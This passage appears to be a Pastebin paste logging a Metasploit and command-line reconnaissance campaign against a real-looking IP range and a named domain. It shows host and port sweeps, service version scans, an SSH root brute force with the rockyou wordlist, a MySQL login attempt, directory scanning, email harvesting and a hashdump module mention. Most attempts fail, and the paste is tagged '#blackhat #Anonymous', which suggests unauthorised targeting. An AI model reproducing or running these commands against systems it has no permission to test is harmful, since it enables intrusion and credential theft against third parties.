  1839. msf > db_import /root/Desktop/Exported.xml
  1840. [*] Importing 'Metasploit XML' data
  1841. [*] Importing host 198.71.232.0
  1842. [*] Importing host 198.71.232.1
  1843. [*] Importing host 198.71.232.2
  1844. [*] Importing host 198.71.232.3
  1845. [*] Importing host 198.71.232.4
  1846. [*] Importing host 198.71.232.5
  1847. [*] Importing host 198.71.232.6
  1848. [*] Importing host 198.71.232.7
  1849. [*] Importing host 198.71.232.9
  1850. [*] Successfully imported /root/Desktop/Exported.xml
  1851.  
  1852.  
  1853.  
  1854. msf > hosts
  1855.  
  1856. Hosts
  1857. =====
  1858.  
  1859. address mac name os_name os_flavor os_sp purpose info comments
  1860. ------- --- ---- ------- --------- ----- ------- ---- --------
  1861. 198.71.232.0 Unknown device
  1862. 198.71.232.1 Unknown device
  1863. 198.71.232.2 Unknown device
  1864. 198.71.232.3 198.71.232.3 Unknown device
  1865. 198.71.232.4 Unknown device
  1866. 198.71.232.5 Unknown device
  1867. 198.71.232.6 Unknown device
  1868. 198.71.232.7 Unknown device
  1869. 198.71.232.9 Unknown device
  1870.  
  1871.  
  1872.  
  1873. msf > hosts -c address,os_flavor
  1874.  
  1875. Hosts
  1876. =====
  1877.  
  1878. address os_flavor
  1879. ------- ---------
  1880. 198.71.232.0
  1881. 198.71.232.1
  1882. 198.71.232.2
  1883. 198.71.232.3
  1884. 198.71.232.4
  1885. 198.71.232.5
  1886. 198.71.232.6
  1887. 198.71.232.7
  1888. 198.71.232.9
  1889.  
  1890.  
  1891.  
  1892. msf > hosts -c address,os_flavor -S Linux
  1893.  
  1894. msf auxiliary(tcp) > show options
  1895.  
  1896. msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R
  1897.  
  1898. RHOSTS => 198.71.232.3
  1899.  
  1900. msf auxiliary(tcp) > run
  1901.  
  1902. msf auxiliary(tcp) > hosts -R
  1903.  
  1904. RHOSTS => 198.71.232.3
  1905.  
  1906. msf auxiliary(tcp) > show options
  1907.  
  1908. msf > services -c name,info 198.71.232.3
  1909.  
  1910. Services
  1911. ========
  1912.  
  1913. host name info
  1914. ---- ---- ----
  1915. 198.71.232.3 http DPS/1.0.3
  1916. 198.71.232.3 https
  1917.  
  1918.  
  1919. msf > services -c name,info -S http
  1920.  
  1921. Services
  1922. ========
  1923.  
  1924. host name info
  1925. ---- ---- ----
  1926. 198.71.232.3 http DPS/1.0.3
  1927. 198.71.232.3 https
  1928. 198.71.232.4 https
  1929. 198.71.232.4 http
  1930. 198.71.232.5 https
  1931. 198.71.232.6 http
  1932. 198.71.232.6 https
  1933. 198.71.232.7 http
  1934. 198.71.232.7 https
  1935. 198.71.232.9 http
  1936.  
  1937. msf > services -c name,info -S https
  1938.  
  1939. Services
  1940. ========
  1941.  
  1942. host name info
  1943. ---- ---- ----
  1944. 198.71.232.3 https
  1945. 198.71.232.4 https
  1946. 198.71.232.5 https
  1947. 198.71.232.6 https
  1948. 198.71.232.7 https
  1949.  
  1950.  
  1951. msf > services -c info,name -p 443
  1952.  
  1953. Services
  1954. ========
  1955.  
  1956. host info name
  1957. ---- ---- ----
  1958. 198.71.232.3 https
  1959. 198.71.232.4 https
  1960. 198.71.232.5 https
  1961. 198.71.232.6 https
  1962. 198.71.232.7 https
  1963.  
  1964.  
  1965. msf > services -c port,proto,state -p 70-81
  1966.  
  1967. msf > services -c port,proto,state -p 70-81
  1968.  
  1969. Services
  1970. ========
  1971.  
  1972. host port proto state
  1973. ---- ---- ----- -----
  1974. 198.71.232.3 80 tcp open
  1975. 198.71.232.4 80 tcp open
  1976. 198.71.232.6 80 tcp open
  1977. 198.71.232.7 80 tcp open
  1978. 198.71.232.9 80 tcp open
  1979.  
  1980. msf > services -c port,proto,state -p 70-81-3306
  1981.  
  1982. Services
  1983. ========
  1984.  
  1985. host port proto state
  1986. ---- ---- ----- -----
  1987. 198.71.232.3 80 tcp open
  1988. 198.71.232.4 80 tcp open
  1989. 198.71.232.6 80 tcp open
  1990. 198.71.232.7 80 tcp open
  1991. 198.71.232.9 80 tcp open
  1992.  
  1993.  
  1994. msf > services -c port,proto,state -p 21-22-25-70-80-81-443-3306
  1995.  
  1996. Services
  1997. ========
  1998.  
  1999. host port proto state
  2000. ---- ---- ----- -----
  2001. 198.71.232.7 22 tcp open
  2002.  
  2003.  
  2004. msf > services -s http -c port 198.71.232.3
  2005.  
  2006. Services
  2007. ========
  2008.  
  2009. host port
  2010. ---- ----
  2011. 198.71.232.3 80
  2012.  
  2013. msf > services -s https -c port 198.71.232.3
  2014.  
  2015. Services
  2016. ========
  2017.  
  2018. host port
  2019. ---- ----
  2020. 198.71.232.3 443
  2021.  
  2022.  
  2023. msf > services -S Unr
  2024.  
  2025. Services
  2026. ========
  2027.  
  2028. host port proto name state info
  2029. ---- ---- ----- ---- ----- ----
  2030.  
  2031.  
  2032. CSV Export
  2033.  
  2034. msf > services -s http -c port 198.71.232.3 -o /root/Desktop/http.csv
  2035.  
  2036. [*] Wrote services to /root/Desktop/http.csv
  2037.  
  2038. msf > services -s https -c port 198.71.232.3 -o /root/Desktop/https.csv
  2039.  
  2040. [*] Wrote services to /root/Desktop/https.csv
  2041.  
  2042. msf > hosts -S Linux -o /root/Desktop/linux.csv
  2043. [*] Wrote hosts to /root/Desktop/linux.csv
  2044.  
  2045. msf > cat /root/Desktop/http.csv
  2046. [*] exec: cat /root/Desktop/http.csv
  2047.  
  2048. host,port
  2049. "198.71.232.3","80"
  2050.  
  2051. msf > cat /root/Desktop/https.csv
  2052. [*] exec: cat /root/Desktop/https.csv
  2053.  
  2054. host,port
  2055. "198.71.232.3","443"
  2056.  
  2057. msf > cat /root/Desktop/linux.csv
  2058. [*] exec: cat /root/Desktop/linux.csv
  2059.  
  2060. address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
  2061.  
  2062. RELOAD ALL METASPLOIT MODULES
  2063.  
  2064. msf > reload_all
  2065. [*] Reloading modules from all module paths...
  2066.  
  2067. ______________________________________________________________________________
  2068. | |
  2069. | METASPLOIT CYBER MISSILE COMMAND V4 |
  2070. |______________________________________________________________________________|
  2071. \ / /
  2072. \ . / / x
  2073. \ / /
  2074. \ / + /
  2075. \ + / /
  2076. * / /
  2077. / . /
  2078. X / / X
  2079. / ###
  2080. / # % #
  2081. / ###
  2082. . /
  2083. . / . * .
  2084. /
  2085. *
  2086. + *
  2087.  
  2088. ^
  2089. #### __ __ __ ####### __ __ __ ####
  2090. #### / \ / \ / \ ########### / \ / \ / \ ####
  2091. ################################################################################
  2092. ################################################################################
  2093. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  2094. ################################################################################
  2095. http://metasploit.pro
  2096.  
  2097.  
  2098. Easy phishing: Set up email templates, landing pages and listeners
  2099. in Metasploit Pro -- learn more on http://rapid7.com/metasploit
  2100.  
  2101. =[ metasploit v4.11.5-2016010401 ]
  2102. + -- --=[ 1517 exploits - 875 auxiliary - 257 post ]
  2103. + -- --=[ 437 payloads - 37 encoders - 8 nops ]
  2104. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  2105.  
  2106.  
  2107. USE ARP_SWEEP
  2108.  
  2109. msf > use auxiliary/scanner/discovery/arp_sweep
  2110. msf auxiliary(arp_sweep) > show options
  2111.  
  2112. Module options (auxiliary/scanner/discovery/arp_sweep):
  2113.  
  2114. Name Current Setting Required Description
  2115. ---- --------------- -------- -----------
  2116. INTERFACE no The name of the interface
  2117. RHOSTS yes The target address range or CIDR identifier
  2118. SHOST no Source IP Address
  2119. SMAC no Source MAC Address
  2120. THREADS 1 yes The number of concurrent threads
  2121. TIMEOUT 5 yes The number of seconds to wait for new data
  2122.  
  2123. msf auxiliary(arp_sweep) > set RHOSTS 198.71.232.3/24
  2124. RHOSTS => 198.71.232.3/24
  2125. msf auxiliary(arp_sweep) > set THREADS 50
  2126. THREADS => 50
  2127. msf auxiliary(arp_sweep) > run
  2128.  
  2129. [*] Scanned 256 of 256 hosts (100% complete)
  2130. [*] Auxiliary module execution completed
  2131.  
  2132.  
  2133. msf auxiliary(arp_sweep) > back
  2134.  
  2135. USE NMAP
  2136.  
  2137. msf > nmap -sn 198.71.232.3/24
  2138. [*] exec: nmap -sn 198.71.232.3/24
  2139.  
  2140.  
  2141. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:31 CEST
  2142. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2143. Nmap scan report for 198.71.232.0
  2144. Host is up (0.11s latency).
  2145. Nmap scan report for 198.71.232.1
  2146. Host is up (0.11s latency).
  2147. Nmap scan report for 198.71.232.2
  2148. Host is up (0.11s latency).
  2149. Nmap scan report for 198.71.232.3
  2150. Host is up (0.11s latency).
  2151. Nmap scan report for 198.71.232.4
  2152. Host is up (0.11s latency).
  2153. Nmap scan report for 198.71.232.5
  2154. Host is up (0.11s latency).
  2155. Nmap scan report for 198.71.232.6
  2156. Host is up (0.11s latency).
  2157. Nmap scan report for 198.71.232.7
  2158. Host is up (0.11s latency).
  2159. Nmap scan report for 198.71.232.8
  2160. Host is up (0.11s latency).
  2161. Nmap scan report for 198.71.232.9
  2162. Host is up (0.11s latency).
  2163. Nmap done: 256 IP addresses (10 hosts up) scanned in 5.25 seconds
  2164.  
  2165.  
  2166. msf > nmap -PU -sn 198.71.232.3/24
  2167. [*] exec: nmap -PU -sn 198.71.232.3/24
  2168.  
  2169.  
  2170. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:33 CEST
  2171. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2172. Nmap done: 256 IP addresses (0 hosts up) scanned in 52.11 seconds
  2173.  
  2174.  
  2175. msf > nmap -O 198.71.232.3
  2176. [*] exec: nmap -O 198.71.232.3
  2177.  
  2178.  
  2179. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 18:34 CEST
  2180. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  2181. Nmap scan report for 198.71.232.3
  2182. Host is up (0.11s latency).
  2183. Not shown: 998 filtered ports
  2184. PORT STATE SERVICE
  2185. 80/tcp open http
  2186. 443/tcp open https
  2187. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  2188. OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
  2189. No OS matches for host
  2190.  
  2191. OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2192. Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds
  2193.  
  2194.  
  2195. SEARCH PORTSCAN
  2196.  
  2197. msf > search portscan
  2198.  
  2199. Matching Modules
  2200. ================
  2201.  
  2202. Name Disclosure Date Rank Description
  2203. ---- --------------- ---- -----------
  2204. auxiliary/scanner/http/wordpress_pingback_access normal Wordpress Pingback Locator
  2205. auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
  2206. auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
  2207. auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
  2208. auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
  2209. auxiliary/scanner/portscan/tcp normal TCP Port Scanner
  2210. auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
  2211. auxiliary/scanner/sap/sap_router_portscanner normal SAPRouter Port Scanner
  2212.  
  2213. USE PORTSCAN
  2214.  
  2215. msf > use auxiliary/scanner/portscan/syn
  2216.  
  2217. msf auxiliary(syn) > set RHOSTS 198.71.232.3
  2218.  
  2219. RHOSTS => 198.71.232.3
  2220.  
  2221. msf auxiliary(syn) > set THREADS 200
  2222.  
  2223. THREADS => 200
  2224.  
  2225. msf auxiliary(syn) > run
  2226.  
  2227. [*] TCP OPEN 198.71.232.3:80
  2228. [*] TCP OPEN 198.71.232.3:443
  2229.  
  2230. SEARCH NAME_VERSION
  2231.  
  2232. msf > search name:_version
  2233.  
  2234. USE TELNET AUXILIARY SCANNER
  2235.  
  2236. msf > use auxiliary/scanner/telnet/telnet_version
  2237. msf auxiliary(telnet_version) > set RHOSTS 198.71.232.3/24
  2238. RHOSTS => 198.71.232.3
  2239. msf auxiliary(telnet_version) > set THREADS 100
  2240. THREADS => 100
  2241. msf auxiliary(telnet_version) > run
  2242.  
  2243. [*] Scanned 41 of 256 hosts (16% complete)
  2244. [*] Scanned 93 of 256 hosts (36% complete)
  2245. [*] Scanned 96 of 256 hosts (37% complete)
  2246. [*] Scanned 130 of 256 hosts (50% complete)
  2247. [*] Scanned 131 of 256 hosts (51% complete)
  2248. [*] Scanned 192 of 256 hosts (75% complete)
  2249. [*] Scanned 193 of 256 hosts (75% complete)
  2250. [*] Scanned 211 of 256 hosts (82% complete)
  2251. [*] Scanned 241 of 256 hosts (94% complete)
  2252. [*] Scanned 256 of 256 hosts (100% complete)
  2253. [*] Auxiliary module execution completed
  2254. msf auxiliary(telnet_version) >
  2255.  
  2256.  
  2257. USE AUXILIARY SSH_VERSION
  2258.  
  2259. msf auxiliary(telnet_version) > use auxiliary/scanner/ssh/ssh_version
  2260. msf auxiliary(ssh_version) > show options
  2261.  
  2262. Module options (auxiliary/scanner/ssh/ssh_version):
  2263.  
  2264. Name Current Setting Required Description
  2265. ---- --------------- -------- -----------
  2266. RHOSTS yes The target address range or CIDR identifier
  2267. RPORT 22 yes The target port
  2268. THREADS 1 yes The number of concurrent threads
  2269. TIMEOUT 30 yes Timeout for the SSH probe
  2270.  
  2271. msf auxiliary(ssh_version) > set RHOSTS 198.71.232.3/24
  2272. RHOSTS => 198.71.232.3/24
  2273. msf auxiliary(ssh_version) > set THREADS 200
  2274. THREADS => 200
  2275. msf auxiliary(ssh_version) > run
  2276.  
  2277. [*] 198.71.232.7:22 SSH server version: SSH-2.0-OpenSSH_6.3 ( service.version=6.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH )
  2278. [*] Scanned 42 of 256 hosts (16% complete)
  2279. [*] Scanned 77 of 256 hosts (30% complete)
  2280. [*] Scanned 119 of 256 hosts (46% complete)
  2281. [*] Scanned 136 of 256 hosts (53% complete)
  2282. [*] Scanned 137 of 256 hosts (53% complete)
  2283. [*] Scanned 156 of 256 hosts (60% complete)
  2284. [*] Scanned 187 of 256 hosts (73% complete)
  2285. [*] Scanned 253 of 256 hosts (98% complete)
  2286. [*] Scanned 255 of 256 hosts (99% complete)
  2287. [*] Scanned 256 of 256 hosts (100% complete)
  2288. [*] Auxiliary module execution completed
  2289.  
  2290.  
  2291. USE ORACLE SCANNER
  2292.  
  2293. msf auxiliary(tnslsnr_version) > show options
  2294.  
  2295. Module options (auxiliary/scanner/oracle/tnslsnr_version):
  2296.  
  2297. Name Current Setting Required Description
  2298. ---- --------------- -------- -----------
  2299. RHOSTS yes The target address range or CIDR identifier
  2300. RPORT 1521 yes The target port
  2301. THREADS 1 yes The number of concurrent threads
  2302.  
  2303. msf auxiliary(tnslsnr_version) > set RHOSTS 198.71.232.3/24
  2304. RHOSTS => 198.71.232.3/24
  2305. msf auxiliary(tnslsnr_version) > set THREADS 200
  2306. THREADS => 200
  2307. msf auxiliary(tnslsnr_version) > run
  2308.  
  2309. [*] Scanned 105 of 256 hosts (41% complete)
  2310. [*] Scanned 113 of 256 hosts (44% complete)
  2311. [*] Scanned 131 of 256 hosts (51% complete)
  2312. [*] Scanned 188 of 256 hosts (73% complete)
  2313. [*] Scanned 200 of 256 hosts (78% complete)
  2314. [*] Scanned 237 of 256 hosts (92% complete)
  2315. [*] Scanned 243 of 256 hosts (94% complete)
  2316. [*] Scanned 250 of 256 hosts (97% complete)
  2317. [*] Scanned 252 of 256 hosts (98% complete)
  2318. [*] Scanned 256 of 256 hosts (100% complete)
  2319. [*] Auxiliary module execution completed
  2320.  
  2321.  
  2322. USE OPEN_PROXY
  2323.  
  2324. msf auxiliary(tnslsnr_version) > use auxiliary/scanner/http/open_proxy
  2325.  
  2326. msf auxiliary(open_proxy) > show options
  2327.  
  2328. msf auxiliary(open_proxy) > show options
  2329.  
  2330. Module options (auxiliary/scanner/http/open_proxy):
  2331.  
  2332. Name Current Setting Required Description
  2333. ---- --------------- -------- -----------
  2334. LOOKUP_PUBLIC_ADDRESS false no Enable test for retrieve public IP address via RIPE.net
  2335. MULTIPORTS false no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  2336. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  2337. RHOSTS yes The target address range or CIDR identifier
  2338. RPORT 8080 yes The target port
  2339. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  2340. THREADS 1 yes The number of concurrent threads
  2341. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  2342. VERIFY_CONNECT false no Enable test for CONNECT method
  2343. VERIFY_HEAD false no Enable test for HEAD method
  2344. ValidCode 200,302 no Valid HTTP code for a successfully request
  2345. ValidPattern server: gws no Valid HTTP server header for a successfully request
  2346.  
  2347. msf auxiliary(open_proxy) > set LOOKUP_PUBLIC_ADDRESS true
  2348. LOOKUP_PUBLIC_ADDRESS => true
  2349. msf auxiliary(open_proxy) > set MULTIPORTS true
  2350. MULTIPORTS => true
  2351. msf auxiliary(open_proxy) > show options
  2352.  
  2353. Module options (auxiliary/scanner/http/open_proxy):
  2354.  
  2355. Name Current Setting Required Description
  2356. ---- --------------- -------- -----------
  2357. LOOKUP_PUBLIC_ADDRESS true no Enable test for retrieve public IP address via RIPE.net
  2358. MULTIPORTS true no Multiple ports will be used : 80, 1080, 3128, 8080, 8123
  2359. RANDOMIZE_PORTS false no Randomize the order the ports are probed
  2360. RHOSTS yes The target address range or CIDR identifier
  2361. RPORT 8080 yes The target port
  2362. SITE www.google.com yes The web site to test via alleged web proxy (default is www.google.com)
  2363. THREADS 1 yes The number of concurrent threads
  2364. UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) yes The HTTP User-Agent sent in the request
  2365. VERIFY_CONNECT false no Enable test for CONNECT method
  2366. VERIFY_HEAD false no Enable test for HEAD method
  2367. ValidCode 200,302 no Valid HTTP code for a successfully request
  2368. ValidPattern server: gws no Valid HTTP server header for a successfully request
  2369.  
  2370. msf auxiliary(open_proxy) > set RANDOMIZE_PORTS true
  2371. RANDOMIZE_PORTS => true
  2372. msf auxiliary(open_proxy) > set RHOSTS 198.71.232.3
  2373. RHOSTS => 198.71.232.3
  2374. msf auxiliary(open_proxy) > set RPORT 8080
  2375. RPORT => 8080
  2376. msf auxiliary(open_proxy) > run
  2377.  
  2378. [*] Scanned 1 of 1 hosts (100% complete)
  2379. [*] Auxiliary module execution completed
  2380. msf auxiliary(open_proxy) >
  2381.  
  2382.  
  2383. USE SSH_LOGIN
  2384.  
  2385. msf auxiliary(open_proxy) > use auxiliary/scanner/ssh/ssh_login
  2386. msf auxiliary(ssh_login) > set RHOSTS 198.71.232.3
  2387. RHOSTS => 198.71.232.3
  2388. msf auxiliary(ssh_login) > set USERNAME root
  2389. USERNAME => root
  2390. msf auxiliary(ssh_login) > set PASS_FILE /root/Desktop/rockyou.txt
  2391. PASS_FILE => /root/Desktop/rockyou.txt
  2392. msf auxiliary(ssh_login) > set THREADS 2000
  2393. THREADS => 2000
  2394. msf auxiliary(ssh_login) > run
  2395.  
  2396. [*] 198.71.232.3:22 SSH - Starting bruteforce
  2397. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
  2398. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
  2399. [-] 198.71.232.3:22 SSH - Could not connect: The connection timed out (198.71.232.3:22).
  2400. [*] Scanned 1 of 1 hosts (100% complete)
  2401. [*] Auxiliary module execution completed
  2402.  
  2403.  
  2404. USE AUXILIARY DIR_SCANNER
  2405.  
  2406. msf auxiliary(ssh_login) > use auxiliary/scanner/http/dir_scanner
  2407. msf auxiliary(dir_scanner) > set THREADS 50
  2408. THREADS => 50
  2409. msf auxiliary(dir_scanner) > set RHOSTS 198.71.232.3
  2410. RHOSTS => 198.71.232.3
  2411. msf auxiliary(dir_scanner) > exploit
  2412.  
  2413. [*] Detecting error code
  2414. [*] Using code '404' as not found for 198.71.232.3
  2415. [*] Scanned 1 of 1 hosts (100% complete)
  2416. [*] Auxiliary module execution completed
  2417. msf auxiliary(dir_scanner) > set RHOSTS www.vyxunbnbs.com
  2418. RHOSTS => www.vyxunbnbs.com
  2419. msf auxiliary(dir_scanner) > exploit
  2420.  
  2421. [*] Detecting error code
  2422. [*] Using code '404' as not found for 198.71.232.3
  2423. [*] Scanned 1 of 1 hosts (100% complete)
  2424. [*] Auxiliary module execution completed
  2425. msf auxiliary(dir_scanner) > set RHOSTS vyxunbnbs.com
  2426. RHOSTS => vyxunbnbs.com
  2427. msf auxiliary(dir_scanner) > exploit
  2428.  
  2429. [*] Detecting error code
  2430. [*] Using code '404' as not found for 198.71.232.3
  2431. [*] Scanned 1 of 1 hosts (100% complete)
  2432. [*] Auxiliary module execution completed
  2433. msf auxiliary(dir_scanner) >
  2434.  
  2435.  
  2436. USE EMAIL_COLLECTOR
  2437.  
  2438. msf auxiliary(dir_scanner) > use auxiliary/gather/search_email_collector
  2439.  
  2440. msf auxiliary(search_email_collector) > set DOMAIN vyxunbnbs.com
  2441.  
  2442. DOMAIN => vyxunbnbs.com
  2443.  
  2444. msf auxiliary(search_email_collector) > run
  2445.  
  2446. [*] Harvesting emails .....
  2447. [*] Searching Google for email addresses from vyxunbnbs.com
  2448. [*] Extracting emails from Google search results...
  2449. [*] Searching Bing email addresses from vyxunbnbs.com
  2450. [*] Extracting emails from Bing search results...
  2451. [*] Searching Yahoo for email addresses from vyxunbnbs.com
  2452. [*] Extracting emails from Yahoo search results...
  2453. [*] Located 0 email addresses for vyxunbnbs.com
  2454. [*] Auxiliary module execution completed
  2455.  
  2456.  
  2457. msf auxiliary(search_email_collector) > use auxiliary/scanner/mysql/mysql_login
  2458. msf auxiliary(mysql_login) > show options
  2459.  
  2460. Module options (auxiliary/scanner/mysql/mysql_login):
  2461.  
  2462. Name Current Setting Required Description
  2463. ---- --------------- -------- -----------
  2464. BLANK_PASSWORDS false no Try blank passwords for all users
  2465. BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
  2466. DB_ALL_CREDS false no Try each user/password couple stored in the current database
  2467. DB_ALL_PASS false no Add all passwords in the current database to the list
  2468. DB_ALL_USERS false no Add all users in the current database to the list
  2469. PASSWORD no A specific password to authenticate with
  2470. PASS_FILE no File containing passwords, one per line
  2471. Proxies no A proxy chain of format type:host:port[,type:host:port][...]
  2472. RHOSTS yes The target address range or CIDR identifier
  2473. RPORT 3306 yes The target port
  2474. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
  2475. THREADS 1 yes The number of concurrent threads
  2476. USERNAME no A specific username to authenticate as
  2477. USERPASS_FILE no File containing users and passwords separated by space, one pair per line
  2478. USER_AS_PASS false no Try the username as the password for all users
  2479. USER_FILE no File containing usernames, one per line
  2480. VERBOSE true yes Whether to print output for all attempts
  2481.  
  2482. msf auxiliary(mysql_login) > set RHOSTS vyxunbnbs.com
  2483. RHOSTS => vyxunbnbs.com
  2484. msf auxiliary(mysql_login) > run
  2485.  
  2486. [-] 198.71.232.3:3306 MYSQL - Unable to connect: The connection timed out (198.71.232.3:3306).
  2487. [*] Scanned 1 of 1 hosts (100% complete)
  2488. [*] Auxiliary module execution completed
  2489. msf auxiliary(mysql_login) >
  2490.  
  2491. msf auxiliary(mysql_login) > creds
  2492.  
  2493. msf auxiliary(mysql_login) > sessions -l
  2494.  
  2495. Active sessions
  2496. ===============
  2497.  
  2498. No active sessions.
  2499.  
  2500.  
  2501. USE LOOT
  2502.  
  2503. msf > loot -h
  2504.  
  2505. Usage: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
  2506.  
  2507. -t <type1,type2> Search for a list of types
  2508. -h,--help Show this help information
  2509. -S,--search Search string to filter by
  2510.  
  2511. Here’s an example of how one would populate the database with some ‘loot’.
  2512.  
  2513. msf exploit(usermap_script) > use post/linux/gather/hashdump
  2514. msf post(hashdump) > show options
  2515.  
  2516. msf post(hashdump) > loot
  2517.  
  2518. Loot
  2519. ====
  2520.  
  2521. host service type name content info path
  2522. ---- ------- ---- ---- ------- ---- ----
  2523.  
  2524. USE AUXILIARY SCANNER HTTP CRAWLER
  2525.  
  2526. msf post(hashdump) > use auxiliary/scanner/http/crawler
  2527. msf auxiliary(crawler) > set RHOST vyxunbnbs.com
  2528. RHOST => vyxunbnbs.com
  2529. msf auxiliary(crawler) > run
  2530.  
  2531. [*] Crawling http://vyxunbnbs.com:80/...
  2532. [*] [00001/00500] 301 - vyxunbnbs.com - http://vyxunbnbs.com/ -> http://www.vyxunbnbs.com/
  2533. [*] Crawl of http://vyxunbnbs.com:80/ complete
  2534. [*] Auxiliary module execution completed
  2535.  
  2536. msf auxiliary(crawler) >
  2537.  
  2538. [*] Done.
  2539.  
  2540. CHECK THE SITE WITH PARSERO
  2541.  
  2542. ┌─[root@parrot]─[~]
  2543. └──╼ #parsero -u www.vyxunbnbs.com
  2544.  
  2545. ____
  2546. | _ \ __ _ _ __ ___ ___ _ __ ___
  2547. | |_) / _` | '__/ __|/ _ \ '__/ _ \
  2548. | __/ (_| | | \__ \ __/ | | (_) |
  2549. |_| \__,_|_| |___/\___|_| \___/
  2550.  
  2551. Starting Parsero v0.75 (https://github.com/behindthefirewalls/Parsero) at 05/29/16 19:59:04
  2552. Parsero scan report for www.vyxunbnbs.com
  2553. http://www.vyxunbnbs.com/images/ 404 Not Found
  2554. http://www.vyxunbnbs.com/_temp/ 404 Not Found
  2555. http://www.vyxunbnbs.com/statshistory/ 404 Not Found
  2556. http://www.vyxunbnbs.com/_backup/ 404 Not Found
  2557. http://www.vyxunbnbs.com/Flash/ 404 Not Found
  2558. http://www.vyxunbnbs.com/stats/ 404 Not Found
  2559. http://www.vyxunbnbs.com/plugins/ 404 Not Found
  2560. http://www.vyxunbnbs.com/_mygallery/ 404 Not Found
  2561. http://www.vyxunbnbs.com/_tempalbums/ 404 Not Found
  2562. http://www.vyxunbnbs.com/dbboon/ 404 Not Found
  2563. http://www.vyxunbnbs.com/cache/ 404 Not Found
  2564. http://www.vyxunbnbs.com/scripts/ 404 Not Found
  2565. http://www.vyxunbnbs.com/mobile/ 200 OK
  2566. http://www.vyxunbnbs.com/_tmpfileop/ 404 Not Found
  2567. http://www.vyxunbnbs.com/QSC/ 404 Not Found
  2568.  
  2569. [+] 15 links have been analyzed and 1 of them are available!!!
  2570.  
  2571. Finished in 2.3001761436462402 seconds
  2572.  
  2573.  
  2574. http://www.vyxunbnbs.com/mobile/ 200 OK
  2575.  
  2576.  
  2577. CHECK THE SITE WITH WPSCAN
  2578.  
  2579. ┌─[root@parrot]─[~]
  2580. └──╼ #wpscan --url www.vyxunbnbs.com/mobile --enumerate u
  2581. _______________________________________________________________
  2582. __ _______ _____
  2583. \ \ / / __ \ / ____|
  2584. \ \ /\ / /| |__) | (___ ___ __ _ _ __
  2585. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  2586. \ /\ / | | ____) | (__| (_| | | | |
  2587. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  2588.  
  2589. WordPress Security Scanner by the WPScan Team
  2590. Version 2.9
  2591. Sponsored by Sucuri - https://sucuri.net
  2592. @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
  2593. _______________________________________________________________
  2594.  
  2595.  
  2596. [!] The remote website is up, but does not seem to be running WordPress.
  2597.  
  2598. COLLECT ALL THE EMAIL WITH THEHARVESTER
  2599.  
  2600. ┌─[root@parrot]─[~]
  2601. └──╼ #theharvester -d vyxunbnbs.com -b all -n -c -t -l 50 -h
  2602.  
  2603. *******************************************************************
  2604. * *
  2605. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  2606. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  2607. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  2608. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  2609. * *
  2610. * TheHarvester Ver. 2.7 *
  2611. * Coded by Christian Martorella *
  2612. * Edge-Security Research *
  2613. * cmartorella@edge-security.com *
  2614. *******************************************************************
  2615.  
  2616.  
  2617. Full harvest..
  2618. [-] Searching in Google..
  2619. Searching 0 results...
  2620. [-] Searching in PGP Key server..
  2621. [-] Searching in Bing..
  2622. Searching 50 results...
  2623. [-] Searching in Exalead..
  2624. Searching 50 results...
  2625. Searching 100 results...
  2626.  
  2627.  
  2628. [+] Emails found:
  2629. ------------------
  2630. pixel-146454504959172-web-@vyxunbnbs.com
  2631.  
  2632. [+] Hosts found in search engines:
  2633. ------------------------------------
  2634. [-] Resolving hostnames IPs...
  2635. 198.71.232.3:www.vyxunbnbs.com
  2636.  
  2637. [+] Starting active queries:
  2638. [-]Performing reverse lookup in :198.71.232.0/24
  2639. Error in DNS resolvers
  2640.  
  2641. DONE
  2642.  
  2643. #blackhat #Anonymous #GLOBAL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!